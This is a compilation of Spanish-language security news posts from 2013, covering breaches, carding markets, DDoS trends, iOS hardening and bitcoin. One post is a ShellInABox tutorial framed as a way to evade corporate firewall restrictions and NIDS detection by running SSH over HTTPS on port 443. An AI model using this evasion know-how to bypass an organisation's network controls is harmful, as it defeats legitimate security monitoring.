Hacker ruso entra en un servidor de la BBC

Un hacker ruso mantuvo el control de uno delos servidores informáticos de la Corporación Británica de Radio BBC durante un tiempo y trató de vender el acceso a ese servidor a otros delincuentes cibernéticos.

Según informó la firma norteamericana Hold Security, sus colaboradores detectaron al hacker la semana pasada cuando alardeaba de su éxito en uno de los foros del mercado negro. Sin embargo se desconoce si logró vender la información antes de que la BBC reaccionara a la señal.

Los representantes de la BBC declararon que la Corporación no hace comentarios sobre preguntas de seguridad.

Fuente

Cuentas de administrador con contraseña que no expira

En una encuesta completamente no científica que realicé durante una presentación reciente de TechEd, pregunté cuanta gente que tiene credenciales de administración de dominio tienen también configurado su cuenta de administrador para que esté exenta de la política de contraseñas que requiere cambios periódicos.

La respuesta fue una risa nerviosa.

Mientras que algunas organizaciones tienen políticas estrictas respecto del cambio de contraseñas, el forzado de esas políticas a menudo es inconsistente. A menor tamaño del departamento de TI, menos probable que los usuarios privilegiados sean estrictos en adherir políticas de seguridad tales como cambiar regularmente la contraseña de las cuentas privilegiadas.

¿Porqué? Probablemente porque nadie salvo los propios administradores podrían percatarse que la política está siendo violada.

En tanto continúe la tendencia inevitable de administradores únicos a manejar cada vez más computadoras, el tamaño del departamento de TI de muchas organizaciones se ha ido reduciendo. Mientras una compañía con 1500 personas hace diez años tendría un pequeño equipo de administradores, la misma compañía podría tener hoy uno o dos solamente.

Con la reducción del tamaño de la administración viene la reducción de la supervisión entre pares. “Quis custodiet ipsos custodes” (¿quien vigila a los vigilantes?) es una pregunta fácil de responder cuando los vigilantes se controlan unos a otros, mucho menos fácil de responder si solo hay uno o dos vigilantes. Quizás en grandes equipos de TI son mejores con el auto-control cuando se trata de cumplimiento de políticas de seguridad sencillamente porque hay más presión entre pares.

Si bien hay consultas que se pueden ejecutar en el Centro de Administración de Directorio Activo para determinar cuales cuentas no han cambiado recientemente su contraseña, esta no es una tarea que sea probable que la ejecute nadie fuera del equipo de administración.

Mientras que algunos administradores pueden encogerse de hombros y decidir que si bien esa es una mala práctica, hay poco riesgo para ellos porque se aseguran que nadie los mire por encima del hombro cuando ingresan su contraseña. La realidad es que como el autor de ciencia ficción señala en un blog reciente (http://www.antipope.org/charlie/blog-static/2013/12/trust-me.html ), los keyloggers se están haciendo pequeños, pueden ser dispositivos USB pasantes e incluso pueden formar parte del propio teclado. A menos que un administrador verifique su computadora cada vez en busca de la presencia de tales dispositivos, alguien que trabaje en la misma organización podría poner tal dispositivo físicamente en la computadora del administrador (otro buen argumento para el doble factor de autenticación para las cuentas privilegiadas.)

Al final de cuentas si uno selecciona la opción "la contraseña no expira nunca" eso depende de uno. Habilitándole se reduce la seguridad de su organización y con el advenimiento de cuentas de servicio administradas, hay menos razones para usar contraseñas estáticas con cualquier cuenta de usuario.

Traducción: Raúl Batista - Segu-Info
Autor: Orin Thomas
Fuente: Windows IT Pro

Nuevo algoritmo para deducir la identidad de personas en fotos no etiquetadas de redes sociales

Un nuevo algoritmo puede que revolucione la forma en que encontramos fotos entre las miles de millones que hay desperdigadas por redes sociales como Facebook y servicios para compartir fotos como Flickr.

Desarrollado por Parham Aarabi y Ron Appel, de la Universidad de Toronto en Canadá, la herramienta de búsqueda utiliza las ubicaciones de otras etiquetas de fotos para cuantificar las relaciones entre los individuos que aparecen en las fotos, incluso aquellos que no están etiquetados en ninguna foto.

Imagínese que coloca en una red social una foto en la que usted y su madre fueron retratados juntos, construyendo un castillo de arena en la playa. En la siguiente foto, usted y su padre están comiendo sandía.

A raíz de las etiquetas en una y otra foto, el algoritmo puede determinar que existe una relación entre su padre y su madre aunque no aparezcan juntos en ninguna de esas dos fotos.

En una tercera foto, usted hace volar una cometa junto a su padre y su madre, pero sólo ésta está etiquetada.

Sin embargo, cuando usted busque fotos de su padre el algoritmo puede presentarle esa foto en la que él no está etiquetado. El algoritmo lo consigue basándose en que hay muchas probabilidades de que él esté ahí retratado.

El hábil algoritmo alcanza una alta fiabilidad, y lo logra sin valerse de ningún software de reconocimiento facial o de objetos, reduciendo así de manera drástica su consumo de recursos computacionales.

Información adicional

Cómo acceder a un terminal SSH desde el navegador web

Normalmente en las empresas los firewalls perimetrales sólo permiten el tráfico HTTP(s) hacia Internet. Hoy vamos a ver otra herramienta para poder evadir esta restricción y poder ejecutar un terminal SSH a través del navegador: Shell In A Box (o ShellInABox).

ShellInABox es un emulador de terminal web basado en ajax para cualquier navegador que soporte Javascript y CSS sin necesidad de disponer de ningún plugin adicional.
Existen otros emuladores para navegador mediante complementos como NaCl o FireSSH, si bien necesitarás acceso al exterior por el puerto 22/TCP.  Con ShellInABox accederás directamente al puerto 443/TCP de HTTPS.

Ahora bien, ¿por qué no cambiar el puerto del demonio SSH del 22/TCP al 443/TCP y dejarnos de tanta historia? Pues principalmente porque no tendrás necesidad de utilizar otro cliente como Putty y porque muchos firewalls con inspección de paquetes detectarían el intercambio de claves al menos que lo ofuscemos con ossh y Potty. 

 

Al instalar certificados SSL/TTL, ShellInABox cifrará todas las comunicaciones cliente-servidor y también hará más difícil la labor de detección de los firewalls/NIDS más "inteligentes".

En esta entrada vamos a probar a instalar ShellInABox en un máquina virtual con Kali Linux:

root@kali:~# apt-get install openssl shellinabox

Por defecto, el servidor web shellinboxd escuchará en el puerto 4200/TCP. Para modificarlo simplemente lo cambiaremos en el fichero de configuración:

root@kali:~# vi /etc/default/shellinabox

# Should shellinaboxd start automatically
SHELLINABOX_DAEMON_START=1

# TCP port that shellinboxd's webserver listens on
SHELLINABOX_PORT=443

# Parameters that are managed by the system and usually should not need
# changing:
# SHELLINABOX_DATADIR=/var/lib/shellinabox
# SHELLINABOX_USER=shellinabox
# SHELLINABOX_GROUP=shellinabox

# Any optional arguments (e.g. extra service definitions).  Make sure
# that that argument is quoted.
#
#   Beeps are disabled because of reports of the VLC plugin crashing
#   Firefox on Linux/x86_64.
SHELLINABOX_ARGS="--no-beep"

Durante la instalación, si no encuentra un certificado adecuado, shellinaboxd intenta crear uno nuevo autofirmado (certificate.pem) mediante openssl. En ese caso el certificado creado se ubica en /var/lib/shellinabox. Si por lo que sea no se ha creado correctamente podéis crearlo vosotros mismos.

Para empezar a utilizarlo, simplemente iniciaremos los servicios:

root@kali:~# service ssh start
[ ok ] Starting OpenBSD Secure Shell server: sshd.

root@kali:~# service shellinabox start
root@kali:~# service shellinabox status
Shell In A Box Daemon is running

Y comprobamos el acceso a través de nuestro navegador:

 
Fuentes y referencias:
- shellinabox - Web based AJAX terminal emulator 
- How to access ssh terminal in web browser on Linux
- Shell In A Box – A Web-Based SSH Terminal to Access Remote Linux Servers
- Crea un tunel TCP a través de HTTP mediante Tunna
- Evadir un portal cautivo mediante un túnel DNS
- Cómo crear un túnel SSH entre un servidor Linux y un cliente Windows

Resumen Ciberdefensa 2013

El 2013 se acaba, como es habitual en estas fechas todos los medios especializados de diferentes temáticas que sea se lanzan a elaborar el resumen del año. Nosotros no hemos querido ser menos y en esta entrada intentaremos sintetizar los hechos mas relevantes en el mundo de la Ciberdefensa

Podríamos llamar al 2013 como el año en que conocimos cómo funcionaban realmente las amenazas persistentes avanzadas y las provenientes de actores de nivel estatal. 

En febrero de 2013, Mandiant publicó el informe "APT1: Exposing One of China's Cyber Espionage Units" argumentando que las actividades de la unidad 61.398 del Ejército de Liberación Popular de China se correspondían con las del grupo conocido como APT1. APT1 es un término utilizado por Mandiant para designar un grupo de personas que son responsables de un conjunto particular de las amenazas persistentes avanzadas. Por primera vez se ponía nombre y apellidos a la presunción de que el gobierno chino estaba detrás de diversas campañas de espionaje a través de Internet.

Cuando todas las miradas acusadoras apuntaban a China apareció Edward Joseph Snowden. Contratista tecnológico estadounidense, antiguo empleado de la Agencia Central de Inteligencia (CIA) y de la Agencia de Seguridad Nacional (NSA). En junio de 2013, Snowden hizo públicos, a través de los periódicos The Guardian y The Washington Post, documentos clasificados como alto secreto sobre varios programas de la NSA, incluyendo el programa de vigilancia PRISM con la colaboración de redes sociales, la interceptación masiva de los backbones de fibra óptica que componen internet entre otros.

Durante el año se fueron sucediendo nuevas relevaciones tanto de detalles técnicos de operaciones de la NSA como de las implicaciones políticas de las mismas.

A pesar de haber transcurrido ya algún tiempo desde su descubrimiento el malware Stuxnet siguió dando de qué hablar. El Final report (Análisis final) de Langner sobre Stuxnet viene con varias sorpresas que requieren una re-evaluación de la operación "Olympic Games". El informe, que resume tres años de investigación y que incluye imágenes de material de archivo de la planta de Natanz, viene con un completo análisis de una versión previa del ataque de Stuxnet contra los controladores Siemens S7-417. Explica el sistema de protección usado en la cascada de centrifugadoras y pone los dos ataques en el contexto, para llegar a conclusiones sobre el cambio de prioridades durante la operación.

Durante el año se detectaron diversas campañas de ataques mediante malware dirigido que podrían tener un origen gubernamental por el tipo de objetivo pero sigue sin conocerse realmente quien esta detrás de estos incidentes. Entre otros Miniduke, NetTraveler (también conocido como "NetFile") y TeamSpy.

La compleja Guerra Civil Siria siguió teniendo su reflejo en internet. Los diversos bandos y facciones hicieron uso propagandístico de la red. Siendo el mas destacado el autodenominado 'Syrian Electronic Army' (formado por partidarios del presidente Bashar-al-Assad). En abril, se atribuyeron la responsabilidad por hackear la cuenta de Twitter de la Associated Press emitiendo la falsa noticia de explosiones en la Casa Blanca - que arrastro momentáneamente el índice DOW JONES. En julio, el grupo comprometido las cuentas de Gmail de tres empleados de la Casa Blanca y de la cuenta de Twitter de Thomson-Reuters.

Fuente: Areópago21

WordPress 3.8, grandes cambios de diseño y uso en dispositivos móviles

Y reseñamos los cambios estéticos de esta nueva versión de WordPress 3.8 "Parker", (panel de administración, tipografías, nuevo tema por defecto estilo “magazine”, iconos, etc), ya que a nivel de seguridad no se ha proporcionado ninguna información por parte de WordPress.

Pero viendo los tickets cerrados en el trac, os recomendamos actualizar ya, ante posibles futuras vulnerabilidades respecto a versiones anteriores en los próximos días.
Cabe destacar el esfuerzo realizado para la adaptación a cualquier tipo de dispositivo, con especial énfasis en los móviles y tablets, por lo que la publicación será más ágil y rápida desde cualquier lugar.

Fuente: Daboweb

Una manera simple de editar nuestras fotografías en Facebook

Si deseamos tener para nuestras fotografías de Facebook herramientas básicas de edición o un kit de efectos para darle un toque especial, podemos considerar esta extensión para Chrome que comentaremos hoy.

No es una opción nueva, ya que la conocemos desde hace tiempo con otro nombre, pero ahora la encontraremos como Photon. Con solo integrarla al navegador contaremos con un interesante editor de fotografías en nuestra cuenta de Facebook.

Solo tenemos que abrir la fotografía en el visor para que encontremos todas las opciones que nos ofrece el Photo Editor de Aviary.

Entre las opciones tenemos aquellas que nos permiten redimensionar la fotografía, rotar, recortar, agregar brillo, contraste, entre otras alternativas. También podemos agregar diferentes marcos, pasando por un abanico de estilo. Y si deseamos darle un toque divertido entonces podemos agregar algunos de los stickers que contiene la aplicación.

Podemos agregar texto o utilizar diferentes pinceles para dibujar sobre la fotografía. O podemos recurrir a la sección dedicada a los filtros, donde encontraremos 20 diferentes opciones. Y como una ayuda adicional, contamos con la herramienta de zoom para ver en detalle diferentes partes de la fotografía.

Una vez que hemos realizado la edición de nuestra imagen, podemos guardarla en nuestro equipo o actualizarla en nuestra cuenta de Facebook.

Fuente

Typify nos crea una página personal integrando las redes sociales

Si estamos buscando una forma interesante de crear y presentar una página personal, podemos tener en cuenta a Typify.

Es un servicio web que nos permite reflejar en una sola página toda nuestra personalidad y dinámica a través de las redes sociales en las que participamos. Esto nos presenta grandes ventajas, ya que nuestra página estará constantemente actualizada (dependiendo nuestra participación en las redes sociales) sin que tener que realizar ningún esfuerzo extra.

El proceso que propone Typify es muy simple, con varias opciones para personalizar el espacio que vamos a crear. Siguiendo la misma dinámica de cualquier red social cuando iniciamos una cuenta, nos permite subir una fotografía, escribir unas líneas a nuestra biografía y buscar un fondo para nuestra portada.

Una vez que hemos completado todos nuestros datos personales, podemos conectar las redes sociales que utilizamos, así como otras plataformas web, tal como vemos en la ilustración:

Un detalle interesante es que la página personal que nos permite crear Typify estará optimizada para cualquier tipo de dispositivo. Así que podremos compartir el enlace de nuestra página con la seguridad que todos nuestros contactos podrá visualizarla correctamente.

Si deseamos probar todas estas características, tendremos que solicitar una invitación dejando nuestro correo electrónico en la página de presentación de Typify.

Vía: Checkapps

Creador de Silk Road pide la devolución de los bitcoins incautados

Ross Ulbricht, creador del sitio "Silk Road", asegura que la moneda virtual no es parte de las reglas de confiscación de EE.UU. El monto retirado tendría un valor de US$ 30 millones.

Ulbricht, acusado de estar detrás de un mercado ilegal de drogas online, ha pedido al gobierno de Estados Unidos que le devuelva las "bitcoins" confiscadas de sus computadores, con un valor de más de US$ 30 millones.

Ross Ulbricht fue arrestado en octubre tras una redada del sitio "Silk Road", un verdadero mercado online de drogas.

Investigadores federales en Nueva York aseguran que Ulbricht operaba bajo el seudónimo "Dread Pirate Roberts" (una referencia a la película "The Princess Bride") y que convirtió el sitio en un lugar donde usuarios anónimos podían vender o comprar contrabando y servicios ilegales.

Los documentos de la corte indican que se retiraron 144.336 bitcoins (una moneda virtual de gran crecimiento durante 2013) desde los computadores de Ulbricht. Aunque está sujeta a fluctuaciones, esta moneda es de alto valor y actualmente posee pocas regulaciones.

En su petición, Ulbricht indica que sus bitcoins deberían ser devueltas ya que no son parte de las reglas de confiscación del gobierno de Estados Unidos.

Fuente: Noticias Dot

Juegos clásicos de consolas del siglo XX ahora en la web

Gracias a Internet Archive tenemos ahora disponibles cientos de juegos de la década de los 70 y 80 que podían utilizarse en las consolas que podéis ver en la imagen.

 

En archive.org/details/consolelivingroom podemos ver los modelos y, al pulsar en cada uno de ellos, acceder a varios juegos que fueron desarrollados para dichas consolas, con la posibilidad de jugar a una versión web que permite emular el funcionamiento de cada uno.

Son en total 742 títulos que podemos probar, recordando cómo pasábamos las horas en 1983 con la tortuga que llevaba a los hijos a su casa, o con los vaqueros azules y rojos que se disparaban rebotando entre piedras. Por supuesto entre ellos tenemos “Asteroids”, de la Atari 7800 ProSystem, lanzado en 1986.

La Atari 2600, de 1977, es la que tiene la mayor lista de juegos disponibles: 528 títulos en total, con “Halo 2600″ entre ellos, inicio de los famoso Halo recreados en 2010.

Para poder disfrutarse online Internet Archive ejecuta el programa JSMESS, encargado de reproducir los ROM correspondientes.

Una joya dentro de un excelente museo en la web.

Analizan los datos de Facebook para detectar movimientos migratorios masivos

Lo que veis en el mapa superior es uno de los resultados de un estudio que han realizado desde Facebook para mostrar cómo ha emigrado la gente de una ciudad a otra dentro del mismo país y entre regiones de países diferentes.

Los datos, publicados por el equipo de Facebook Data Science quieren mostrar información relacionada con las migraciones coordinadas, cambios de una ciudad a otra realizadas por un gran número de personas en un corto periodo de tiempo, algo extremadamente importante para analizar tanto patrones de comportamiento como índices de calidad de vida en diversas regiones del planeta.

En el mapa las ciudades de origen de las migraciones coordinadas están representados por puntos azules, las ciudades de destino son los puntos rojos, con un tamaño proporcional a la cantidad de personas que se cambiaron. En todos los casos las migraciones coordinadas están representados por un arco entre el origen y la ciudad de destino.

Para obtener esa información han analizado los perfiles que indican origen y ciudad de residencia actual. Entre los resultados relacionados con migraciones internacionales han destacado dos ejemplos interesantes de personas que llegan a Estados Unidos:

Migraciones de Cuba: la principal ciudad de destino es Miami, aunque reconocen que los cubanos que se mudan a los Estados Unidos son más propensos a tener acceso a Internet y a usar Facebook, por lo que los datos pueden estar exagerando el alcance de la migración coordinada procedente de Cuba.

Migraciones de México: Chicago, Houston, Dallas y Los Angeles son las preferidas, interpretando este fenómeno como la migración en cadena: una persona se mueve primero y luego se une a otras personas de la misma ciudad natal.

El estudio completo lo podéis ver en el enlace publicado anteriormente, divulgado por allfacebook.com hace pocas horas.

Fuente

Recomendaciones en materia de Seguridad de Datos Personales (México)

El gobierno de México ha publicado en el Diario oficial de la Federación (DOF) las Recomendaciones en materia de Seguridad de Datos Personales emitidas por el IFAI, las cuales constituyen un marco de referencia respecto a las acciones que se consideran como las mínimas necesarias para la seguridad de los datos personales. La Recomendación General es la adopción de un Sistema de Gestión de Seguridad de Datos Personales (SGSDP) basado en el ciclo PHVA (Planear-Hacer-Verificar-Actuar).

El artículo 19 de la Ley Federal de Protección de Datos Personales en Posesión de los Particulares (en adelante, la Ley) establece que: Todo responsable que lleve a cabo tratamiento de datos personales deberá establecer y mantener medidas de seguridad administrativas, técnicas y físicas que permitan proteger los datos personales contra daño, pérdida, alteración, destrucción o el uso, acceso o tratamiento no autorizado.

El cumplimiento de las Recomendaciones podrá ser un factor a considerar para la reducción de sanciones en los casos que ocurra una vulneración a la seguridad de los datos personales, según lo establecido en el Artículo 58 del Reglamento de la Ley Federal de Protección de Datos Personales (RLFPDPPP).

 

Junto con las Recomendaciones el IFAI ha presentado en su sitio web dos documentos, una Guía para implementar un Sistema de Gestión de Seguridad de Datos Personales y la Metodología de Análisis de Riesgo BAA.

Las Recomendaciones y la Guía responden al "¿Qué y Cómo?" para instruir a responsables, encargados y cualquier otro interesado sobre los pasos clave de la implementación de un SGSDP, orientado a la mejora continua y a lograr un nivel aceptable de riesgo, de acuerdo al modelo y objetivos de la organización. Además, próximamente se dará a conocer un Manual en materia de Seguridad de Datos Personales para MIPYMES, que contendrá de manera simplificada los objetivos del SGSDP.

La Guía es un ejercicio de concreción, síntesis y armonización de diferentes estándares internacionales como BS 10012, ISO 27001, ISO 27002, NIST SP 800-14 entre otros, de los cuales el IFAI recomienda su consulta para la adecuada gestión de la seguridad de los datos personales, en este sentido las organizaciones que ya tienen madurez en el tema de seguridad o sistemas de gestión encontrarán que la implementación de un SGSDP no representa una carga adicional, sino un esquema de trabajo que se puede acoplar y documentar con sus esquemas ya existentes.

Por su parte la Metodología BAA, aunque no forma parte de las Recomendaciones, es una propuesta innovadora en muchos aspectos respecto a su enfoque de la valoración del riesgo, considerando tres variables: el Beneficio que representan los datos personales para un atacante, la Anonimidad que puede tener el atacante y la Accesibilidad a los entornos.

Más allá del incentivo que representa la posible atenuación de multas, todo aquel involucrado en el tratamiento de datos personales debe considerar el valor de implementar un SGSDP: primero, porque la protección de datos personales es un derecho fundamental de los ciudadanos, segundo, el SGSDP ayuda a prevenir y mitigar los efectos de una vulneración a la seguridad, finalmente, para evitar pérdidas económicas debido a compensación de daños y pérdida de clientes.

En suma, la protección de los datos personales habilita el comercio y aumenta la competitividad, gracias al aumento de la confianza de los consumidores e inversionistas, por ello las Recomendaciones y la Guía son herramientas de alto impacto para alcanzar estos objetivos.

Fuente: bSecure

Roban 13.000 dólares en Dogecoin, la alternativa al Bitcoin

Empezó como una broma y se convirtió en una nueva moneda virtual con bastantes seguidores. El Dogecoin (dogecoin.com) es conocido por la carita de perro manso en sus “monedas”, un proyecto que nació como una moneda de código libre y que ganó mucha popularidad en reddit, apareciendo en algunos documentos oficiales del gobierno indio en la sección de “evitemos este tipo de monedas”.

El caso es que al mismo tiempo que gana la atención de inversores y adictos a la aventura financiera, también gana la atención de aquéllos que acostumbran a robar, y así ha sido. La víctima es Dogewallet (dogewallet.com), un monedero de este tipo de monedas que ha visto como 21 millones de dogecoins han desaparecido de su base de datos, sumando un total de 13.000 dólares.

Mientras los robados se quejan en el foro doges.org, Dogewallet informa que devolverá el dinero a los afectados, aunque de momento ha cerrado sus puertas para evitar pérdidas mayores con posibles nuevos ataques.

Los dogecoins son más fáciles de minar (ya se ha minado el 14% de los previstos) y, aunque el valor es mucho menos que el de los bitcoins, está creciendo bastante durante las últimas semanas, aunque parece que nadie se libra de los criptoladrones.

Fuente

Google, pensando en construir el asistente personal definitivo

Leemos en TC una interesante noticia anunciada en el evento parisino LeWeb, en el que el director de ingeniería de Google Scott Huffman nos ha anunciado la dirección que tomará Google Search en los próximos meses.

Partiendo de la idea de que nuestras expectativas respecto a cómo tiene que funcionar un motor de búsqueda cambian continua y rápidamente, y de que cada vez se queda más anticuada la mecánica de los “diez enlaces azules” desplegados en primera página, Google pretende cambiar el chip respecto a su Search y ofrecernos una herramienta que se parezca más a un asistente personal. Huffman nos explica que la próxima generación se basará, exclusivamente, en hacer que nuestras tareas diarias se conviertan en algo más simple y rápido.

Se comentaba en la conferencia que un medio en el que integrar Google Search podría ser perfectamente el vehículo, o en dispositivos que ni siquiera dispongan de pantalla: en los que simplemente interactuemos mediante la conversación, utilizando en estos casos sólamente micrófonos y altavoces cuyo reconocimiento funcione a través de un “ok Google”.

Por ahora, el principio de esta idea existe en forma de Google reconociendo unos 38 lenguajes y más de 18 mil millones de hechos y cómo se conectan entre ellos, hechos que potencialmente son los que conformarían el Google del futuro: un asistente proactivo y que conozca nuestros hábitos, costumbres y gustos personales con el fin de ofrecernos la información más directa posible.

Fuente: Enlace

Ataques DDoS: más sofisticados y constantes

Los ataques distribuidos de denegación de servicio (DDoS, por sus siglas en inglés) son un pilar del arsenal con que cuentan los hackers para vulnerar. Su importancia es tal que de 2011 a la fecha este elemento por sí mismo ha evolucionado para hacer mayor daño a las instituciones gubernamentales y a las organizaciones que hacen transacciones en línea o tienen importantes inversiones de su marca en el web.

Al ejecutar un ataque DDoS, lo que se pretende es dejar fuera de servicio un sistema Web saturando y consumiendo todo el ancho de banda disponible en el mismo. En gran parte, su creciente uso obedece a que es cada vez más fácil conseguir avanzados kits de herramientas de ataque DDoS, a menudo gratuitos. De ahí que, según cifras de Akamai, firma de seguridad IT basada en la Nube, de 2010 a 2012 este tipo de amenaza se ha triplicado en todo el orbe.

Pero, ¿cuál es el objetivo primordial? Lejos de lo que pudiera pensarse, la motivación no es siempre la de obtener dinero de la empresa vulnerada a cambio de hacer cesar el ataque: de acuerdo con Daniel Villanueva, vicepresidente de Arbor Networks para América Latina, esto sucede así solo en 27% de los casos a nivel global. El ataque también puede ser un distractor para cubrir la penetración de un sistema central o la fuga de información, o bien puede deberse a mero vandalismo. Con todo, la mayor parte de los ataques DDoS (33%) son motivados por razones ideológicas o políticas.

Por citar un ejemplo, está el caso que se dio en Filipinas el año pasado: en protesta por el asesinato de un pescador a manos de la policía local sin respetar sus derechos, se dio un ataque distribuido de denegación de servicio que dejó sin internet al país entero por una semana.
Villanueva, entrevistado, dejó ver la situación de México: a nivel regional, este país fue el objetivo de la mitad de los ataques DDoS perpetuados a gobiernos en los últimos dos años.

En cuanto a la sofisticación, es notoria la forma en que los ataques han ido mutando de 2011 a la fecha: “En el sector público, en una hora se pueden detectar 30 tipos de ataques distintos, incluyendo ataques a servidores, DNS, etcétera. Esa es la tendencia: cambiar rápido el vector de ataque, y en materia de DDoS mezclar los ataques volumétricos con los de aplicación”, dijo el directivo de Arbor Networks.

En este sentido, un reciente estudio de Radware, empresa de soluciones de seguridad, aplicado durante este año deja ver que 56% de los ataques distribuidos de denegación de servicio se dirigen a aplicaciones, y el resto a redes, siendo el sector de servicios financieros el que más ataques DDoS ha recibido en el mundo.

También está aumentando la intensidad. Es conocido el caso de DDoS contra Spamhaus, perpetrado a principios de año, el cual rompió récord al arrojar 300 Gigabits por segundo (Gbps) de datos falsos. A decir de Villanueva, en la región latinoamericana ya se han visto ataques de 100 Gbps aunque el promedio actualmente es de 10 Gbps.

Fuente: bSecure

Tarjetas de crédito y débito a la venta en línea

El reciente ataque a la empresa Target en donde robaron 40 millones de tarjetas de débito y crédito, permitió a los delincuentes crear un "nuevo producto": cientos de miles de tarjetas en blanco emitidas por bancos fuera de Estados Unidos y que se están utilizando en todo el mundo.

El 20 de diciembre Brain Krebs publicó una historia acerca del sitio rescatador [dot] la donde explica cómo dos bancos compraron tarjetas a los ladrones para descubrir cómo obtenían los números de tarjeta de crédito que luego codifican en nuevas tarjetas en blanco y las utilizan para ir de compras.

Una característica clave de esa tienda en particular es que cada tarjeta se asigna a un determinado nombre "base". El término escogido es un argot que se refiere a una palabra código arbitraria que describe todas las tarjetas robadas de un comerciante específico. En ese primer caso el nombre base fue "Tortuga".

Ahora se publicó una segunda operación llamada Operation Barbarossa, que consta de más de 330.000 débito y tarjetas de crédito emitidas por bancos en Europa, Asia, América Latina y Canadá.

Según una gran banco en los Estados Unidos que adquirió el muestreo de las tarjetas a través de varios países, todas las tarjetas en la base de Barbarossa también fueron utilizados durante el período de tiempo de la brecha de Target.

Las tarjetas para la venta en la base de Barbarossa varían en precio desde U$S 23,62 a U$S 315 por tarjeta. Los precios parecen estar influenciados por una serie de factores, incluyendo el banco emisor, el tipo de tarjeta (débito o crédito), qué tan pronto expire la tarjeta y si la tarjeta tiene una notación especial que a menudo indica un límite superior de crédito, como por ejemplo una tarjeta platino.

Los precios también parecen estar influenciados por lo raro que es encontrar tarjetas de un banco específico disponible en el mercado negro. Las tarjetas más caras fueron emitidas por los bancos en Singapur, Corea del sur y los Emiratos Árabes Unidos.

Fuente: Krebs on Security

Revelan manual secreto para interrogaciones del FBI al querer registrar su copyright

Quién sabe por qué el autor del manual quiso registrar una obra que supuestamente era ultra secreta.

El reconocido medio liberal estadounidense Mother Jones reveló recientemente una historia bastante extraña: El FBI tiene un manual ultrasecreto de 78 páginas para interrogaciones, al que han intentado acceder durante años la ONG más grande de ese país, la Unión Estadounidense por las Libertades Civiles (aunque en 2012 el FBI finalmente les entregó una copia del manual, pero que venía fuertemente censurada).

Curiosamente, en enero del 2010 el agente de alto rango del FBI que escribió el manual quiso registrarlo para obtener los derechos de autor, lo que significa que como parte del trámite debió entregarle una copia a la Biblioteca del Congreso norteamericano, quienes durante años han tenido sin saberlo esta copia del manual sin censura disponible a todos los ciudadanos con su tarjeta de la biblioteca pública.

Gracias a ésto, los activistas por los derechos civiles pudieron acceder al contenido censurado sin mayores problemas (aunque solo de forma presencial pues no es permitido extraer ninguna copia desde la Biblioteca del Congreso), donde por ejemplo se encontraron con que el manual aconsejaba a los agentes del FBI a tomar fotografías de cuerpo entero a los detenidos acompañados de una botella de agua, para así usarlas en contra de posibles acusaciones de abusos en un juicio.

Además de todo esto, lo más estúpido según Techdirt es que cualquier obra creada por un empleado del gobierno federal es automáticamente de dominio público, por lo que en teoría no deberían siquiera poder obtener su copyright.

Fuente: Fayerwayer

Acciones para fortificar iPhone y iPad

En la Universidad de Texas han publicado una check-list de las cosas que deberías hacer para fortificar la seguridad de un terminal iOS. Si estás en un entorno empresarial en el que hay un MDM o haces uso de iPhone Configuration Utility para desplegar políticas de seguridad en los terminales de tu empresa, merece la pena que las repases:

Acciones de Seguridad Básica

01.- Actualizar el sistema operativo a la última versión
02.- No hacer Jailbreaking
03.- Configurar las actualizaciones de seguridad automáticas para las aplicaciones
04.- Configurar la funcionalidad de borrado remoto (wiping)
05.- Activar el servicio Find My iPhone
06.- Cifrar los backups de Apple iTunes
07.- Eliminar todos los datos antes de devolverlo, llevarlo a reparar o reciclarlo

Acciones de Seguridad en Autenticación

08.- Activar el passcode
09.- Usar passcodes complejos
10.- Activar el autobloqueo temporal
11.- Deshabilitar el periodo de gracia para el bloqueo (tiempo sin pedir passcode)
12.- Configurar borrado de datos tras varios fallos en el passcode
13.- Activar Data Protection

Acciones de seguridad en Navegación

14.- Activar el servicio anti-phishing/anti-fraude en Safari
15.- Deshabilitar las opcines de auto rellenado
16.- Bloquear el uso de cookies de terceros
17.- Activar el servicio Do-Not-Track

Acciones de Seguridad de Red

18.- Deshabilitar preguntar para conectarse a redes WiFi
19.- Deshabilitar WiFi cuando no esté en uso
20.- Deshabilitar BlueTooth cuando no esté en uso
21.- Deshabilitar compartir Internet cuando se esté utilizando
22.- Olvidar las redes WiFi después de usarlas

Acciones Adicionales de Seguridad

23.- Desactivar los servicios de Geo-localización
24.- Restringir el acceso a los servicios de localización, fotos y contactos
25.- Deshabilitar el centro de control con la pantalla bloqueada
26.- Deshabilitar Apple Touch ID
27.- Activar la navegación privada en Apple Safari
28.- Desactivar JavaScript en Mobile Safari

La verdad es que como primera aproximación no está mal, pero nosotros añadiríamos alguna opción más así que os dejamos una segunda parte de opciones de seguridad adicional para que os puedan completar esta lista, y que hacen referencia a técnicas de ataque descritas en el libro de Hacking iOS.

Acciones de Seguridad 2

29.- Desactivar la previsualización de mensajes en pantalla bloqueada
30.- Desactivar Siri con pantalla de bloqueo
31.- Configurar cuentas de servicio en apps y no contraseñas de cuenta
32.- No conectar el terminal a equipos o cargadores que no sean de confianza
33.- No activar pre-visualización automática de imágenes en correos electrónicos

Como siempre, al final el último responsable de la seguridad de tu terminal eres tú, así que ten mucho cuidado con lo que haces, y dónde lo haces.

Fuente: Seguridad Apple

Robocoin, primer ATM de #Bitcoin

La máquina, fabricada por la empresa norteamericana Robocoin (ver video), se asemeja un cajero automático común y corriente.

No obstante, en vez de poderse realizar en él transacciones tradicionales, sirve para cambiar dólares canadienses por bitcoins, la moneda virtual de internet inventada en 2008 por un experto en computación anónimo, conocido sólo por su seudónimo Satoshi Nakamoto.

Usuarios se alinearon frente al cajero automático para inaugurarlo, antes de recurrir a sus teléfonos inteligentes para comprar café y dulces en el café Waves.

Este cajero automático de bitcoins es el primero en su estilo en el mundo, según uno de sus dueños, Mitchel Demeter, un emprendedor local que comenzó a intercambiar bitcoins hace varios años, y este año abrió con dos socios Bitcoiniacs, una casa de cambios para esta moneda en Vancouver.

Él y sus amigos, que estudiaron juntos, dicen que vieron en la posibilidad de desarrollar estos cajeros automáticos una oportunidad de negocios. "Nadie tenía acceso a un cajero automático, todo el mundo compraba y vendía en páginas online", señala Demeter.

Los usuarios tienen un código, similar a la clave bancaria regular, para acceder a su cuenta en internet de bitcoins en el cajero automático.

Pueden retirar el equivalente a la moneda local sobre la base de un tipo de cambio que actualmente se ubica en 1 bitcoin por 200 dólares, o depositar dinero en efectivo.

La transferencia de dinero se realiza a través de VirtEx, el sistema de transacciones monetarias en internet.

Las personas pueden luego usar sus bitcoins con un teléfono inteligente, de una manera similar a la que utilizarían una tarjeta de crédito, o para comprar en línea.

"Es la moneda de internet, tan real como cualquier otra", dice Demeter.

